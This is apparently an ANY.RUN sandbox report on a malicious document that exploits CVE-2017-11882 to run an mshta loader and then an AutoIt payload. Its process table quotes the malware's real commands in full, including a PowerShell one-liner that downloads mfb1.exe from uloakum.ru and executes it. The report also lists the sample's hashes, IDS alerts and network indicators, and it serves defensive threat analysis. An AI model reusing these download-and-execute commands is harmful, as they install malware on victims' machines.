Malware analysis 959a55ef670bfee3907ce3d9fa2abf7b52d43b01e709fb75b21dd5430b241224 Malicious activity

Add for printing

File name:	959a55ef670bfee3907ce3d9fa2abf7b52d43b01e709fb75b21dd5430b241224
Full analysis:	https://app.any.run/tasks/0f7a3bdb-5bde-4e56-bef5-c76f0a27ecd2
Verdict:	Malicious activity
Threats:	A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection. Malware Trends Tracker >>>
Analysis date:	October 09, 2019, 19:12:28
OS:	Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:	exploit CVE-2017-11882 loader autoit
Indicators:
MIME:	application/octet-stream
File info:	data
MD5:	5C4ECCEA1CA3A1D8D33886DF63BCD24B
SHA1:	CD6131B7848956F71AB30EC8759BB0CDD9E9C215
SHA256:	959A55EF670BFEE3907CE3D9FA2ABF7B52D43B01E709FB75B21DD5430B241224
SSDEEP:	1536:gssIAnJiYC8tVxdHoP13Gm+xaARqhK1pFxU7f6m9mJm6m5mzmimWmOmHmDmhmG:g+AJiYC8+

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Launch configuration

Task duration:: 300 seconds
Heavy Evasion option:: on
Network geolocation:: off
Additional time used:: 240 seconds
MITM proxy:: off
Privacy:: Public submission
Fakenet option:: off
Route via Tor:: off
Autoconfirmation of UAC:: on
Network:: on

Software preset

Internet Explorer 8.0.7601.17514 undefined
Adobe Acrobat Reader DC MUI (15.023.20070)
Adobe Flash Player 26 ActiveX (26.0.0.131)
Adobe Flash Player 26 NPAPI (26.0.0.131)
Adobe Flash Player 26 PPAPI (26.0.0.131)
Adobe Refresh Manager (1.8.0)
CCleaner (5.35)
FileZilla Client 3.36.0 (3.36.0)
Google Chrome (75.0.3770.100)
Google Update Helper (1.3.34.7)
Java 8 Update 92 (8.0.920.14)
Java Auto Updater (2.8.92.14)
Microsoft .NET Framework 4.7.2 (4.7.03062)
Microsoft Office Access MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Excel MUI (English) 2010 (14.0.6029.1000)
Microsoft Office OneNote MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Outlook MUI (English) 2010 (14.0.6029.1000)
Microsoft Office PowerPoint MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Professional 2010 (14.0.6029.1000)
Microsoft Office Proof (English) 2010 (14.0.6029.1000)
Microsoft Office Proof (French) 2010 (14.0.6029.1000)
Microsoft Office Proof (Spanish) 2010 (14.0.6029.1000)
Microsoft Office Proofing (English) 2010 (14.0.6029.1000)
Microsoft Office Publisher MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Shared MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Single Image 2010 (14.0.6029.1000)
Microsoft Office Word MUI (English) 2010 (14.0.6029.1000)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (9.0.30729.6161)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (10.0.40219)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (12.0.30501.0)
Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.21.27702 (14.21.27702.2)
Microsoft Visual C++ 2019 X86 Additional Runtime - 14.21.27702 (14.21.27702)
Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.21.27702 (14.21.27702)
Mozilla Firefox 68.0.1 (x86 en-US) (68.0.1)
Notepad++ (32-bit x86) (7.5.1)
Opera 12.15 (12.15.1748)
Skype version 8.29 (8.29)
Update for Microsoft .NET Framework 4.7.2 (KB4087364) (1)
VLC media player (2.2.6)
WinRAR 5.60 (32-bit) (5.60.0)

Hotfixes

Client LanguagePack Package
Client Refresh LanguagePack Package
CodecPack Basic Package
Foundation Package
IE Troubleshooters Package
InternetExplorer Optional Package
KB2534111
KB2999226
KB4019990
KB976902
LocalPack AU Package
LocalPack CA Package
LocalPack GB Package
LocalPack US Package
LocalPack ZA Package
ProfessionalEdition
UltimateEdition

Add for printing

MALICIOUS
- Equation Editor starts application (CVE-2017-11882)
  - EQNEDT32.EXE (PID: 4024)
- Executes PowerShell scripts
  - cmd.exe (PID: 4064)
- Drops/Downloads known MSHTA loader script
  - mshta.exe (PID: 2720)
- Application was dropped or rewritten from another process
  - j.exe (PID: 1128)
  - tdim.exe (PID: 3024)
- Downloads executable files from the Internet
  - powershell.exe (PID: 2656)
SUSPICIOUS
- Starts Microsoft Office Application
  - rundll32.exe (PID: 3060)
- Executed via COM
  - EQNEDT32.EXE (PID: 4024)
- Starts MSHTA.EXE for opening HTA or HTMLS files
  - EQNEDT32.EXE (PID: 4024)
- Creates files in the user directory
  - mshta.exe (PID: 2720)
  - powershell.exe (PID: 2656)
- Starts CMD.EXE for commands execution
  - mshta.exe (PID: 2720)
- Executes scripts
  - j.exe (PID: 1128)
- Executable content was dropped or overwritten
  - powershell.exe (PID: 2656)
  - j.exe (PID: 1128)
- Drop AutoIt3 executable file
  - j.exe (PID: 1128)
INFO
- Creates files in the user directory
  - WINWORD.EXE (PID: 2820)
- Reads Microsoft Office registry keys
  - WINWORD.EXE (PID: 2820)
- Reads internet explorer settings
  - mshta.exe (PID: 2720)
- Application was crashed
  - EQNEDT32.EXE (PID: 4024)
- Dropped object may contain Bitcoin addresses
  - j.exe (PID: 1128)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Add for printing

No Malware configuration.

Add for printing

No data.

Add for printing

All screenshots are available in the full report

Add for printing

Total processes

Monitored processes

Malicious processes

Suspicious processes

Behavior graph

Click at the process to see the details

Process information

PID	CMD	Path	Indicators	Parent process
3060	"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\admin\AppData\Local\Temp\959a55ef670bfee3907ce3d9fa2abf7b52d43b01e709fb75b21dd5430b241224	C:\Windows\system32\rundll32.exe	—	explorer.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows host process (Rundll32) Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255)
2820	"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\959a55ef670bfee3907ce3d9fa2abf7b52d43b01e709fb75b21dd5430b241224"	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	—	rundll32.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Exit code: 0 Version: 14.0.6024.1000
4024	"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE		svchost.exe
User: admin Company: Design Science, Inc. Integrity Level: MEDIUM Description: Microsoft Equation Editor Exit code: 0 Version: 00110900
2720	mshta http://bit.ly/30U32Jv &AAAAAAAAAAAAAAAC	C:\Windows\system32\mshta.exe		EQNEDT32.EXE
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft (R) HTML Application host Exit code: 0 Version: 8.00.7600.16385 (win7_rtm.090713-1255)
4064	"C:\Windows\System32\cmd.exe" /c powershell (new-object System.Net.WebClienT).DownloadFile('http://uloakum.ru/mfb1.exe','%temp%\j.exe'); Start '%temp%\j.exe'	C:\Windows\System32\cmd.exe	—	mshta.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
2656	powershell (new-object System.Net.WebClienT).DownloadFile('http://uloakum.ru/mfb1.exe','C:\Users\admin\AppData\Local\Temp\j.exe'); Start 'C:\Users\admin\AppData\Local\Temp\j.exe'	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe		cmd.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255)
1128	"C:\Users\admin\AppData\Local\Temp\j.exe"	C:\Users\admin\AppData\Local\Temp\j.exe		powershell.exe
User: admin Integrity Level: MEDIUM Exit code: 0
3924	"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\55821785\uutuojw.vbs"	C:\Windows\System32\WScript.exe	—	j.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.8.7600.16385
3024	"C:\Users\admin\AppData\Local\Temp\55821785\tdim.exe" pjmxvrp.bfk	C:\Users\admin\AppData\Local\Temp\55821785\tdim.exe	—	WScript.exe
User: admin Company: AutoIt Team Integrity Level: MEDIUM Description: AutoIt v3 Script Exit code: 0 Version: 3, 3, 8, 1
2588	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	—	tdim.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft .NET Services Installation Utility Exit code: 0 Version: 4.7.3062.0 built by: NET472REL1

Add for printing

Total events

3 549

Read events

2 657

Write events

Delete events

Modification events

No data

Add for printing

Executable files

Suspicious files

Text files

Unknown types

Dropped files

PID	Process	Filename		Type
2820	WINWORD.EXE	C:\Users\admin\AppData\Local\Temp\CVR2F6E.tmp.cvr		—
		MD5:—	SHA256:—
2656	powershell.exe	C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7SEVTSNFMN1A72JN3TD5.temp		—
		MD5:—	SHA256:—
1128	j.exe	C:\Users\admin\AppData\Local\Temp\55821785\pjmxvrp.bfk		—
		MD5:—	SHA256:—
2720	mshta.exe	C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@bit[1].txt		text
		MD5:4B2D9A1CF1172F690957188713FD9E82	SHA256:06831CE65DFDE7A9288597099932A56DC728110AD70448B90E9721EA37016BDF
2720	mshta.exe	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LH043OAM\sa[1].hta		html
		MD5:D8C3194BB22F87657098C084C2B7E388	SHA256:2670B26875A08E8EDAEE7CFBD1D48D41BAB6D02A58878CD27C0872E31AA1B028
1128	j.exe	C:\Users\admin\AppData\Local\Temp\55821785\rjxqat.dat		text
		MD5:17482BA897678A1136B50F87672F6B2C	SHA256:6E152DDC197C5F429CC7A65F8CF22C83672A92C03FDEC5373271306784C27D5B
2820	WINWORD.EXE	C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm		pgc
		MD5:9126DFA35E55567F680643106759DFC0	SHA256:521F2234CE5082ABA1DA2EEFFC6009CE621C8E1DBD2D7CA3A583DD1DE9466B00
2656	powershell.exe	C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF10479a.TMP		binary
		MD5:57F2BEBD8AB4D14DFF05F8F1EE1B1091	SHA256:24089794FD7207234A86BFD7344771ABD7A0BC15DCEB1A256EF927F010B65B1F
1128	j.exe	C:\Users\admin\AppData\Local\Temp\55821785\qrxljv.txt		text
		MD5:C4240990DCA29A70F2C346A0040A487B	SHA256:10E82F8C0EF49E1FA779A2E9D652BB0741238D2134B501F3926148535CA2A956
2656	powershell.exe	C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms		binary
		MD5:57F2BEBD8AB4D14DFF05F8F1EE1B1091	SHA256:24089794FD7207234A86BFD7344771ABD7A0BC15DCEB1A256EF927F010B65B1F

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Add for printing

HTTP(S) requests

TCP/UDP connections

DNS requests

Threats

HTTP requests

PID	Process	Method	HTTP Code	IP	URL	CN	Type	Size	Reputation
2720	mshta.exe	GET	200	45.15.253.237:80	http://uloakum.ru/sa.hta	unknown	html	1.76 Kb	suspicious
2656	powershell.exe	GET	200	45.15.253.237:80	http://uloakum.ru/mfb1.exe	unknown	executable	1.21 Mb	suspicious

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID	Process	IP	Domain	ASN	CN	Reputation
2720	mshta.exe	67.199.248.10:80	bit.ly	Bitly Inc	US	shared
2720	mshta.exe	45.15.253.237:80	uloakum.ru	—	—	suspicious
2656	powershell.exe	45.15.253.237:80	uloakum.ru	—	—	suspicious

DNS requests

Domain	IP	Reputation
bit.ly	67.199.248.10 67.199.248.11	shared
uloakum.ru	45.15.253.237	suspicious

Threats

PID	Process	Class	Message
2720	mshta.exe	Misc activity	SUSPICIOUS [PTsecurity] Cmd.Powershell.Download HTTP UserAgent (Win7)
2720	mshta.exe	Potentially Bad Traffic	ET POLICY Possible HTA Application Download
2720	mshta.exe	Attempted User Privilege Gain	ET CURRENT_EVENTS SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl
2656	powershell.exe	Potentially Bad Traffic	ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile
2656	powershell.exe	Potential Corporate Privacy Violation	ET POLICY PE EXE or DLL Windows file download HTTP
2656	powershell.exe	Potentially Bad Traffic	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
2720	mshta.exe	Attempted User Privilege Gain	ET WEB_CLIENT GENERIC VB ShellExecute Function Inside of VBSCRIPT tag

Add for printing

No debug info

General Info

959a55ef670bfee3907ce3d9fa2abf7b52d43b01e709fb75b21dd5430b241224

5C4ECCEA1CA3A1D8D33886DF63BCD24B

CD6131B7848956F71AB30EC8759BB0CDD9E9C215

959A55EF670BFEE3907CE3D9FA2ABF7B52D43B01E709FB75B21DD5430B241224

1536:gssIAnJiYC8tVxdHoP13Gm+xaARqhK1pFxU7f6m9mJm6m5mzmimWmOmHmDmhmG:g+AJiYC8+

Software environment set and analysis options

Launch configuration

Software preset

Hotfixes

Behavior activities

MALICIOUS

Equation Editor starts application (CVE-2017-11882)

Executes PowerShell scripts

Drops/Downloads known MSHTA loader script

Application was dropped or rewritten from another process

Downloads executable files from the Internet

SUSPICIOUS

Starts Microsoft Office Application

Executed via COM

Starts MSHTA.EXE for opening HTA or HTMLS files

Creates files in the user directory

Starts CMD.EXE for commands execution

Executes scripts

Executable content was dropped or overwritten

Drop AutoIt3 executable file

INFO

Creates files in the user directory

Reads Microsoft Office registry keys

Reads internet explorer settings

Application was crashed

Dropped object may contain Bitcoin addresses

Malware configuration

Static information

Video and screenshots

Processes

Behavior graph

Specs description

Process information

Information

Information

Information

Information

Information

Information

Information

Information

Information

Information

Registry activity

Modification events

Files activity

Dropped files

Network activity

HTTP requests

Connections

DNS requests

Threats

Debug output strings